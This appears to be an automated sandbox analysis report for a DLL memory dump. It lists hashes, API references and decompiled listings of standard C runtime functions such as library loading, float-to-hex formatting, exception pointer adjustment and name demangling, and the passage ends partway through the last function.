Opcode ID: 866737b615560de9ff5d5bcb112997b4ffe2355dbf354e784227135986223521
Instruction ID: d42dff86d720b0321103a26de4b43c3fb6a9e800276825a749ae122a6ebd7170
Opcode Fuzzy Hash: 866737b615560de9ff5d5bcb112997b4ffe2355dbf354e784227135986223521
Instruction Fuzzy Hash: AA415771900209AFCF05CFD4CD90AEE7BB5BF48304F2485A9FA546A260D3359991EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A39C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A39C2(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E6E1B0F58(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x6e1a39cf
0x6e1a39d7
0x6e1a3a0c
0x6e1a39d9
0x6e1a39e2
0x00000000
0x6e1a3a09
0x6e1a3a08
0x6e1a3a08

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E1A397D), ref: 6E1A39CF
GetLastError.KERNEL32(?,6E1A397D), ref: 6E1A39D9
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E1A3A01

Strings

api-ms-, xrefs: 6E1A39E6

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: e1e075d73da035b5214a3ad71a0a1145afe8969801c8260c114d79d729ae5edf
Instruction ID: 245a7ffd7e5a64759be324bb2f10550cc23879c1142079a0711d867928f9a439
Opcode Fuzzy Hash: e1e075d73da035b5214a3ad71a0a1145afe8969801c8260c114d79d729ae5edf
Instruction Fuzzy Hash: E0E04834284248B7EF505EE0DD0DB5D7E599B21B55F248024FA0CE80D4E761D892D594

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B44A1, Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1B44A1(void* __edx, void* __fp0, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				void* _t119;
				signed int* _t120;
				void* _t123;
				signed int _t125;
				signed int _t131;
				signed int* _t132;
				signed int* _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t154;
				void* _t158;
				unsigned int _t159;
				signed int _t166;
				void* _t167;
				signed int _t168;
				signed int* _t169;
				signed int _t172;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t195;

				_t195 = __fp0;
				_t167 = __edx;
				_t180 = _a24;
				if(_t180 < 0) {
					_t180 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E6E1A710E( &_v60, _t167, _a36);
				_t5 = _t180 + 0xb; // 0xb
				_t192 = _a12 - _t5;
				if(_a12 > _t5) {
					_t135 = _a4;
					_t141 = _t135[1];
					_t168 =  *_t135;
					__eflags = (_t141 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t141 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t141;
						if(__eflags > 0) {
							L14:
							_t17 = _t184 + 1; // 0x2
							_t169 = _t17;
							_t85 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t85;
							_v40 = _t169;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t141 & 0x7ff00000;
							_t91 = 0x30;
							if((_t141 & 0x7ff00000) != 0) {
								 *_t184 = 0x31;
								L19:
								_t143 = 0;
								__eflags = 0;
								L20:
								_t25 =  &(_t169[0]); // 0x2
								_t185 = _t25;
								_v16 = _t185;
								__eflags = _t180;
								if(_t180 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t143;
								}
								 *_t169 = _t95;
								_t97 = _t135[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t170 = _t143;
									_t144 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v16 = _t143;
									_v24 = 0xf0000;
									do {
										__eflags = _t180;
										if(_t180 <= 0) {
											break;
										}
										_t123 = E6E1CAFE0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
										_t158 = 0x30;
										_t125 = _t123 + _t158 & 0x0000ffff;
										__eflags = _t125 - 0x39;
										if(_t125 > 0x39) {
											_t125 = _t125 + _v32;
											__eflags = _t125;
										}
										_t159 = _v24;
										_t170 = (_t159 << 0x00000020 | _v16) >> 4;
										 *_t185 = _t125;
										_t185 = _t185 + 1;
										_t144 = _t159 >> 4;
										_t98 = _v12 - 4;
										_t180 = _t180 - 1;
										_v16 = (_t159 << 0x00000020 | _v16) >> 4;
										_v24 = _t159 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v16 = _t185;
									__eflags = _t98;
									if(_t98 < 0) {
										goto L42;
									}
									_t119 = E6E1CAFE0( *_t135 & _t170, _v12, _t135[1] & _t144 & 0x000fffff);
									__eflags = _t119 - 8;
									if(_t119 <= 8) {
										goto L42;
									}
									_t50 = _t185 - 1; // 0x2
									_t120 = _t50;
									_t139 = 0x30;
									while(1) {
										_t153 =  *_t120;
										__eflags = _t153 - 0x66;
										if(_t153 == 0x66) {
											goto L35;
										}
										__eflags = _t153 - 0x46;
										if(_t153 != 0x46) {
											_t135 = _a4;
											__eflags = _t120 - _v40;
											if(_t120 == _v40) {
												_t54 = _t120 - 1;
												 *_t54 =  *(_t120 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t153 - 0x39;
												if(_t153 != 0x39) {
													_t154 = _t153 + 1;
													__eflags = _t154;
												} else {
													_t154 = _v32 + 0x3a;
												}
												 *_t120 = _t154;
											}
											goto L42;
										}
										L35:
										 *_t120 = _t139;
										_t120 = _t120 - 1;
									}
								} else {
									__eflags =  *_t135 - _t143;
									if( *_t135 <= _t143) {
										L42:
										__eflags = _t180;
										if(_t180 > 0) {
											_push(_t180);
											_t115 = 0x30;
											_push(_t115);
											_push(_t185);
											E6E19BBC0(_t180);
											_t185 = _t185 + _t180;
											__eflags = _t185;
											_v16 = _t185;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t185 = _t99;
											_v16 = _t185;
										}
										 *_t185 = (_v5 << 5) + 0x50;
										_t104 = E6E1CAFE0( *_t135, 0x34, _t135[1]);
										_t186 = 0;
										_t105 = _v16;
										_t148 = (_t104 & 0x000007ff) - _v20;
										__eflags = _t148;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x2
										_t172 = _t63;
										_v40 = _t172;
										if(__eflags < 0) {
											L50:
											_t148 =  ~_t148;
											asm("adc esi, 0x0");
											_t186 =  ~_t186;
											_t136 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t136 = 0x2b;
												L51:
												 *(_t105 + 1) = _t136;
												_t181 = _t172;
												_t106 = 0x30;
												 *_t172 = _t106;
												_t107 = 0;
												__eflags = _t186;
												if(__eflags < 0) {
													L55:
													__eflags = _t181 - _t172;
													if(_t181 != _t172) {
														L59:
														_push(_t136);
														_push(_t107);
														_push(0x64);
														_push(_t186);
														_t108 = E6E1CAF00(_t195);
														_t186 = _t136;
														_t136 = _t148;
														_v32 = _t172;
														_t172 = _v40;
														 *_t181 = _t108 + 0x30;
														_t181 = _t181 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t181 - _t172;
														if(_t181 != _t172) {
															L64:
															_push(_t136);
															_push(_t107);
															_push(0xa);
															_push(_t186);
															_push(_t148);
															_t110 = E6E1CAF00(_t195);
															_v40 = _t172;
															 *_t181 = _t110 + 0x30;
															_t181 = _t181 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t149 = _t148 + 0x30;
															__eflags = _t149;
															 *_t181 = _t149;
															 *(_t181 + 1) = _t107;
															_t182 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t182;
														}
														__eflags = _t186 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t148 - 0xa;
														if(_t148 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t186 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t148 - 0x64;
													if(_t148 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t136 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t136);
													_push(_t107);
													_push(_t136);
													_push(_t186);
													_t113 = E6E1CAF00(_t195);
													_t186 = _t136;
													_t136 = _t148;
													_v32 = _t172;
													_t172 = _v40;
													 *_t172 = _t113 + 0x30;
													_t68 = _t172 + 1; // 0x2
													_t181 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t148 - 0x3e8;
												if(_t148 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t148;
											if(_t148 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t184 = _t91;
							_t143 =  *_t135 | _t135[1] & 0x000fffff;
							__eflags = _t143;
							if(_t143 != 0) {
								_v20 = 0x3fe;
								goto L19;
							}
							_v20 = _t143;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
							_t141 = _t135[1];
							goto L14;
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t182 = E6E1B47BA(_t135, _t141, _t135, _t184, _a12, _a16, _a20, _t180, 0, _a32, 0);
					__eflags = _t182;
					if(_t182 == 0) {
						_t131 = E6E1CB340(_t184, 0x65);
						__eflags = _t131;
						if(_t131 != 0) {
							_t166 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t166;
							 *_t131 = _t166;
							 *((char*)(_t131 + 3)) = 0;
						}
						_t182 = 0;
					} else {
						 *_t184 = 0;
					}
					goto L66;
				}
				_t132 = E6E1B100B(_t192);
				_t182 = 0x22;
				 *_t132 = _t182;
				E6E1AD950();
				goto L66;
			}

0x6e1b44a1
0x6e1b44a1
0x6e1b44ac
0x6e1b44b1
0x6e1b44b3
0x6e1b44b3
0x6e1b44b7
0x6e1b44c0
0x6e1b44c2
0x6e1b44c7
0x6e1b44ca
0x6e1b44cd
0x6e1b44e3
0x6e1b44e6
0x6e1b44eb
0x6e1b44f5
0x6e1b44fa
0x6e1b454e
0x6e1b4550
0x6e1b455f
0x6e1b4562
0x6e1b4562
0x6e1b4565
0x6e1b4567
0x6e1b456e
0x6e1b4580
0x6e1b4583
0x6e1b4588
0x6e1b458c
0x6e1b458d
0x6e1b45ad
0x6e1b45b0
0x6e1b45b0
0x6e1b45b0
0x6e1b45b2
0x6e1b45b2
0x6e1b45b2
0x6e1b45b5
0x6e1b45b8
0x6e1b45ba
0x6e1b45cb
0x6e1b45bc
0x6e1b45bc
0x6e1b45bc
0x6e1b45cd
0x6e1b45d2
0x6e1b45d2
0x6e1b45d7
0x6e1b45da
0x6e1b45e4
0x6e1b45e6
0x6e1b45e8
0x6e1b45ed
0x6e1b45ee
0x6e1b45f1
0x6e1b45f4
0x6e1b45f7
0x6e1b45f7
0x6e1b45f9
0x00000000
0x00000000
0x6e1b4610
0x6e1b4617
0x6e1b461b
0x6e1b461e
0x6e1b4621
0x6e1b4623
0x6e1b4623
0x6e1b4623
0x6e1b4629
0x6e1b462c
0x6e1b4630
0x6e1b4632
0x6e1b4636
0x6e1b4639
0x6e1b463c
0x6e1b463d
0x6e1b4640
0x6e1b4643
0x6e1b4646
0x6e1b4646
0x6e1b464b
0x6e1b464e
0x6e1b4651
0x00000000
0x00000000
0x6e1b4668
0x6e1b466d
0x6e1b4671
0x00000000
0x00000000
0x6e1b4675
0x6e1b4675
0x6e1b4678
0x6e1b4679
0x6e1b4679
0x6e1b467b
0x6e1b467e
0x00000000
0x00000000
0x6e1b4680
0x6e1b4683
0x6e1b468a
0x6e1b468d
0x6e1b4690
0x6e1b46a5
0x6e1b46a5
0x6e1b46a5
0x6e1b4692
0x6e1b4692
0x6e1b4695
0x6e1b469f
0x6e1b469f
0x6e1b4697
0x6e1b469a
0x6e1b469a
0x6e1b46a1
0x6e1b46a1
0x00000000
0x6e1b4690
0x6e1b4685
0x6e1b4685
0x6e1b4687
0x6e1b4687
0x6e1b45dc
0x6e1b45dc
0x6e1b45de
0x6e1b46a8
0x6e1b46a8
0x6e1b46aa
0x6e1b46ac
0x6e1b46af
0x6e1b46b0
0x6e1b46b1
0x6e1b46b2
0x6e1b46ba
0x6e1b46ba
0x6e1b46bc
0x6e1b46bc
0x6e1b46bf
0x6e1b46c2
0x6e1b46c5
0x6e1b46c7
0x6e1b46c9
0x6e1b46c9
0x6e1b46d6
0x6e1b46dd
0x6e1b46e4
0x6e1b46e6
0x6e1b46ef
0x6e1b46ef
0x6e1b46f2
0x6e1b46f4
0x6e1b46f4
0x6e1b46f7
0x6e1b46fa
0x6e1b4706
0x6e1b4706
0x6e1b470a
0x6e1b470d
0x6e1b470f
0x00000000
0x6e1b46fc
0x6e1b46fc
0x6e1b4702
0x6e1b4702
0x6e1b4710
0x6e1b4710
0x6e1b4713
0x6e1b4717
0x6e1b4718
0x6e1b471a
0x6e1b471c
0x6e1b471e
0x6e1b4748
0x6e1b4748
0x6e1b474a
0x6e1b4757
0x6e1b4757
0x6e1b4758
0x6e1b4759
0x6e1b475b
0x6e1b475d
0x6e1b4762
0x6e1b4764
0x6e1b4768
0x6e1b476b
0x6e1b476e
0x6e1b4770
0x6e1b4771
0x6e1b4771
0x6e1b4773
0x6e1b4773
0x6e1b4775
0x6e1b4782
0x6e1b4782
0x6e1b4783
0x6e1b4784
0x6e1b4786
0x6e1b4787
0x6e1b4788
0x6e1b4791
0x6e1b4794
0x6e1b4796
0x6e1b4797
0x6e1b4797
0x6e1b4799
0x6e1b4799
0x6e1b4799
0x6e1b479c
0x6e1b479e
0x6e1b47a1
0x6e1b47a3
0x6e1b47a9
0x6e1b47ae
0x6e1b47ae
0x6e1b47b9
0x6e1b47b9
0x6e1b4777
0x6e1b4779
0x00000000
0x00000000
0x6e1b477b
0x00000000
0x00000000
0x6e1b477d
0x6e1b4780
0x00000000
0x00000000
0x00000000
0x6e1b4780
0x6e1b474c
0x6e1b474e
0x00000000
0x00000000
0x6e1b4750
0x00000000
0x00000000
0x6e1b4752
0x6e1b4755
0x00000000
0x00000000
0x00000000
0x6e1b4755
0x6e1b4720
0x6e1b4725
0x6e1b472b
0x6e1b472b
0x6e1b472c
0x6e1b472d
0x6e1b472e
0x6e1b4730
0x6e1b4735
0x6e1b4737
0x6e1b4739
0x6e1b473e
0x6e1b4741
0x6e1b4743
0x6e1b4743
0x6e1b4746
0x6e1b4746
0x00000000
0x6e1b4746
0x6e1b4727
0x6e1b4729
0x00000000
0x00000000
0x00000000
0x6e1b4729
0x6e1b46fe
0x6e1b4700
0x00000000
0x00000000
0x00000000
0x6e1b4700
0x6e1b46fa
0x00000000
0x6e1b45de
0x6e1b45da
0x6e1b458f
0x6e1b459b
0x6e1b459b
0x6e1b459d
0x6e1b45a4
0x00000000
0x6e1b45a4
0x6e1b459f
0x00000000
0x6e1b459f
0x6e1b4552
0x6e1b4558
0x6e1b4558
0x6e1b455b
0x6e1b455b
0x6e1b455c
0x00000000
0x6e1b455c
0x6e1b4554
0x6e1b4556
0x00000000
0x00000000
0x00000000
0x6e1b4556
0x6e1b4514
0x6e1b4519
0x6e1b451b
0x6e1b4528
0x6e1b452f
0x6e1b4531
0x6e1b453c
0x6e1b453c
0x6e1b453f
0x6e1b4541
0x6e1b4541
0x6e1b4545
0x6e1b451d
0x6e1b451d
0x6e1b451d
0x00000000
0x6e1b451b
0x6e1b44cf
0x6e1b44d6
0x6e1b44d7
0x6e1b44d9
0x00000000

APIs

_strrchr.LIBCMT ref: 6E1B4528

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 1b3c2871a3c74c357e7de06a5117c077a778ff91563f583b162419d722660148
Instruction ID: 85302aaa2ffc0f0a8c2eb5edffd7621bf5c04ec3aa1512118e7e42279be729f7
Opcode Fuzzy Hash: 1b3c2871a3c74c357e7de06a5117c077a778ff91563f583b162419d722660148
Instruction Fuzzy Hash: BFB14872A046469FEB01CFA8C8507EEBBF9EF56300F25C56AD454DB341E6388983DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C044, Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6E19C044() {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				void* _t58;
				void* _t61;
				intOrPtr _t71;
				signed int _t74;
				signed int _t78;
				signed char _t80;
				signed char _t83;
				signed char* _t84;
				signed char _t96;
				signed char* _t97;
				signed char* _t99;
				signed char* _t104;
				void* _t108;

				E6E19AAE0(0x6e2102c8, 0x10);
				_t74 = 0;
				_t52 =  *(_t108 + 0x10);
				_t80 = _t52[4];
				if(_t80 == 0 ||  *((intOrPtr*)(_t80 + 8)) == 0) {
					L30:
					_t53 = 0;
					goto L31;
				} else {
					_t96 = _t52[8];
					if(_t96 != 0 ||  *_t52 < 0) {
						_t83 =  *_t52;
						_t104 =  *(_t108 + 0xc);
						if(_t83 >= 0) {
							_t104 =  &(( &(_t104[0xc]))[_t96]);
						}
						 *(_t108 - 4) = _t74;
						_t99 =  *(_t108 + 0x14);
						if(_t83 >= 0 || ( *_t99 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t108 + 8));
							if((_t83 & 0x00000008) == 0) {
								if(( *_t99 & 0x00000001) == 0) {
									_t83 =  *(_t54 + 0x18);
									if(_t99[0x18] != _t74) {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											_t78 = 0;
											_t74 = (_t78 & 0xffffff00 | ( *_t99 & 0x00000004) != 0x00000000) + 1;
											 *(_t108 - 0x20) = _t74;
											goto L29;
										}
									} else {
										if(_t83 == 0 || _t104 == 0) {
											goto L32;
										} else {
											E6E1A3BD0(_t104, E6E19B7C2(_t83,  &(_t99[8])), _t99[0x14]);
											goto L29;
										}
									}
								} else {
									if( *(_t54 + 0x18) == 0 || _t104 == 0) {
										goto L32;
									} else {
										E6E1A3BD0(_t104,  *(_t54 + 0x18), _t99[0x14]);
										if(_t99[0x14] == 4 &&  *_t104 != 0) {
											_push( &(_t99[8]));
											_push( *_t104);
											goto L21;
										}
										goto L29;
									}
								}
							} else {
								_t83 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e212ff8; // 0x0
							 *((intOrPtr*)(_t108 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e204228();
								_t83 =  *((intOrPtr*)(_t108 - 0x1c))();
								L12:
								if(_t83 == 0 || _t104 == 0) {
									L32:
									E6E1AF464(_t74, _t83, _t96, _t99, _t104);
									asm("int3");
									E6E19AAE0(0x6e2102e8, 8);
									_t97 =  *(_t108 + 0x10);
									_t84 =  *(_t108 + 0xc);
									if( *_t97 >= 0) {
										_t101 =  &(( &(_t84[0xc]))[_t97[8]]);
									} else {
										_t101 = _t84;
									}
									 *(_t108 - 4) =  *(_t108 - 4) & 0x00000000;
									_t105 =  *(_t108 + 0x14);
									_push( *(_t108 + 0x14));
									_push(_t97);
									_push(_t84);
									_t76 =  *((intOrPtr*)(_t108 + 8));
									_push( *((intOrPtr*)(_t108 + 8)));
									_t58 = E6E19C044() - 1;
									if(_t58 == 0) {
										_t61 = E6E19CE42(_t101, _t105[0x18], E6E19B7C2( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])));
									} else {
										_t61 = _t58 - 1;
										if(_t61 == 0) {
											_t61 = E6E19CE52(_t101, _t105[0x18], E6E19B7C2( *((intOrPtr*)(_t76 + 0x18)),  &(_t105[8])), 1);
										}
									}
									 *(_t108 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t61;
								} else {
									 *_t104 = _t83;
									_push( &(_t99[8]));
									_push(_t83);
									L21:
									 *_t104 = E6E19B7C2();
									L29:
									 *(_t108 - 4) = 0xfffffffe;
									_t53 = _t74;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6e19c04b
0x6e19c050
0x6e19c052
0x6e19c055
0x6e19c05a
0x6e19c16a
0x6e19c16a
0x00000000
0x6e19c069
0x6e19c069
0x6e19c06e
0x6e19c078
0x6e19c07a
0x6e19c07f
0x6e19c084
0x6e19c084
0x6e19c086
0x6e19c089
0x6e19c08e
0x6e19c0b0
0x6e19c0b0
0x6e19c0b6
0x6e19c0d7
0x6e19c116
0x6e19c11c
0x6e19c143
0x00000000
0x6e19c149
0x6e19c14e
0x6e19c152
0x6e19c153
0x00000000
0x6e19c153
0x6e19c11e
0x6e19c120
0x00000000
0x6e19c126
0x6e19c137
0x00000000
0x6e19c13c
0x6e19c120
0x6e19c0d9
0x6e19c0dd
0x00000000
0x6e19c0eb
0x6e19c0f2
0x6e19c0fe
0x6e19c108
0x6e19c109
0x00000000
0x6e19c109
0x00000000
0x6e19c0fe
0x6e19c0dd
0x6e19c0b8
0x6e19c0b8
0x00000000
0x6e19c0b8
0x6e19c095
0x6e19c095
0x6e19c09a
0x6e19c09f
0x00000000
0x6e19c0a1
0x6e19c0a3
0x6e19c0ac
0x6e19c0bb
0x6e19c0bd
0x6e19c17c
0x6e19c17c
0x6e19c181
0x6e19c189
0x6e19c18e
0x6e19c191
0x6e19c197
0x6e19c1a0
0x6e19c199
0x6e19c199
0x6e19c199
0x6e19c1a3
0x6e19c1a7
0x6e19c1aa
0x6e19c1ab
0x6e19c1ac
0x6e19c1ad
0x6e19c1b0
0x6e19c1b9
0x6e19c1bc
0x6e19c1f2
0x6e19c1be
0x6e19c1be
0x6e19c1c1
0x6e19c1d8
0x6e19c1d8
0x6e19c1c1
0x6e19c1f7
0x6e19c201
0x6e19c20d
0x6e19c0cb
0x6e19c0cb
0x6e19c0d0
0x6e19c0d1
0x6e19c10b
0x6e19c112
0x6e19c156
0x6e19c156
0x6e19c15d
0x6e19c16c
0x6e19c16f
0x6e19c17b
0x6e19c17b
0x6e19c0bd
0x6e19c09f
0x00000000
0x00000000
0x00000000
0x6e19c06e

APIs

___AdjustPointer.LIBCMT ref: 6E19C10B
___AdjustPointer.LIBCMT ref: 6E19C12E
___AdjustPointer.LIBCMT ref: 6E19C1CA

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: cc5472b84d07739c342424afee2050e33370de4e2c56953d7f2217b1b3cf2ed4
Instruction ID: 83e26e2689008c6823f8206e9c9322e61bcb4be836b154d3341019eb1be8153f
Opcode Fuzzy Hash: cc5472b84d07739c342424afee2050e33370de4e2c56953d7f2217b1b3cf2ed4
Instruction Fuzzy Hash: A451DE76604602EFEB19CF94C860BAA77A4EF15714F20452DD9914A290E731E8C0FB98

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0444, Relevance: 6.1, APIs: 4, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A0444(signed int* _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t46;
				intOrPtr _t47;
				signed int* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t57;
				char* _t60;
				char* _t62;
				signed int* _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				signed int _t80;
				intOrPtr _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t87 =  *0x6e21304c; // 0x0
				_t88 = _t87 + 1;
				 *0x6e21304c = _t88;
				_t74 =  *_t88;
				_t94 = 0;
				_t70 = _t74;
				_v12 = 0;
				_t91 = 0;
				_v8 = 0;
				_t46 = _t70 - 0x41;
				if(_t46 == 0) {
					if(_a16 != 0) {
						L32:
						_t42 = _t88 + 1; // 0x1
						_t47 = _t42;
						L33:
						 *0x6e21304c = _t47;
						_t48 = _a4;
						_t48[1] = _t94;
						L34:
						 *_t48 = _t94;
						L35:
						return _t48;
					}
					_t49 = _a8;
					if( *_t49 == 2 ||  *_t49 == 3) {
						 *_t49 = 5;
						goto L31;
					} else {
						if( *_t49 != 1) {
							goto L32;
						}
						 *_t49 = 4;
						L31:
						_t88 =  *0x6e21304c; // 0x0
						goto L32;
					}
				}
				_t50 = _t46 - 1;
				if(_t50 == 0) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E6E19E994( &_v12, 0x3e);
						L24:
						_t53 =  *0x6e21304c; // 0x0
						_t47 = _t53 + 1;
						goto L33;
					}
					L22:
					_t48 = _a4;
					_t48[1] = _t94;
					_t48[1] = 2;
					goto L34;
				}
				if(_t50 == 1) {
					 *_a8 = 5;
					goto L24;
				}
				if(_t74 == 0) {
					L19:
					E6E19D50F(_a4, 1);
					_t48 = _a4;
					goto L35;
				}
				_t57 =  *((intOrPtr*)(_t88 + 1));
				if(_t57 == 0) {
					goto L19;
				}
				if(_a16 != 0) {
					goto L22;
				}
				_t5 = _t70 - 0x30; // -48
				_t6 = _t88 + 2; // 0x3
				 *0x6e21304c = _t6;
				_t73 = _t57 + 0xffffffd0 + (_t5 << 4);
				if(_t57 + 0xffffffd0 + (_t5 << 4) > 1) {
					E6E19E994( &_v12, 0x2c);
					_t69 = E6E19D8A2( &_v12,  &_v28, E6E19D5E5(_t73,  &_v20, 0, 0, _t73, 0));
					_t94 =  *_t69;
					_t91 = _t69[1];
				}
				_v20 = _t94;
				_v16 = _t91;
				E6E19D9F3( &_v20, 0x3e);
				_t60 =  *0x6e21304c; // 0x0
				_t89 = _v20;
				_t80 = _v16;
				_v12 = _t89;
				_v8 = _t80;
				if( *_t60 != 0x24) {
					_v16 = _t80;
					_v20 = _t89;
					E6E19D9F3( &_v20, 0x5e);
					_t89 = _v20;
					_t80 = _v16;
					_t62 =  *0x6e21304c; // 0x0
					_v12 = _t89;
					_v8 = _t80;
				} else {
					_t62 = _t60 + 1;
					 *0x6e21304c = _t62;
				}
				if( *_t62 == 0) {
					if(_t80 <= 1) {
						if(_t89 == 0) {
							E6E19D795( &_v12, 1);
						} else {
							E6E19D2BD( &_v12, 0x6e2057bc);
						}
						_t89 = _v12;
						_t80 = _v8;
					}
				} else {
					 *0x6e21304c = _t62 + 1;
				}
				_t48 = _a4;
				 *_t48 = _t89;
				_t48[1] = _t80 | 0x00004000;
				goto L35;
			}

0x6e1a044a
0x6e1a0450
0x6e1a0452
0x6e1a0459
0x6e1a045b
0x6e1a045d
0x6e1a0463
0x6e1a0466
0x6e1a0468
0x6e1a046b
0x6e1a046e
0x6e1a05ba
0x6e1a05e2
0x6e1a05e2
0x6e1a05e2
0x6e1a05e5
0x6e1a05e5
0x6e1a05ea
0x6e1a05ed
0x6e1a05f0
0x6e1a05f0
0x6e1a05f2
0x6e1a05f6
0x6e1a05f6
0x6e1a05bc
0x6e1a05c2
0x6e1a05d6
0x00000000
0x6e1a05c9
0x6e1a05cc
0x00000000
0x00000000
0x6e1a05ce
0x6e1a05dc
0x6e1a05dc
0x00000000
0x6e1a05dc
0x6e1a05c2
0x6e1a0474
0x6e1a0477
0x6e1a0591
